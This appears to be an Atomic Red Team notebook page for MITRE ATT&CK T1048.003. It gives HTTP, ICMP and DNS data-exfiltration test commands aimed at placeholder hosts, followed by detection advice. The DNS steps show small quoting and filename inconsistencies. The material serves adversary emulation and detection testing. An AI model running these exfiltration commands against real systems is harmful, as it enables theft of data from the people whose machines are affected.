# T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. 

## Atomic Tests

In [ ]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.

**Supported Platforms:** macos, linux
Run it with these steps!
1. Victim System Configuration:

    mkdir /tmp/victim-staging-area
    echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

2. Using Python to establish a one-line HTTP server on victim system:

    cd /tmp/victim-staging-area
    python -m SimpleHTTPServer 1337

3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt


### Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP
Exfiltration of specified file over ICMP protocol.

Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\Windows\System32\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
```

In [ ]:
Invoke-AtomicTest T1048.003 -TestNumbers 2

### Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
Exfiltration of specified file over DNS protocol.

**Supported Platforms:** linux
Run it with these steps!
1. On the adversary machine run the below command.

    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt

2. On the victim machine run the below commands.

    xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
    
3. Once the data is received, use the below command to recover the data.

    cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r


## Detection
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) 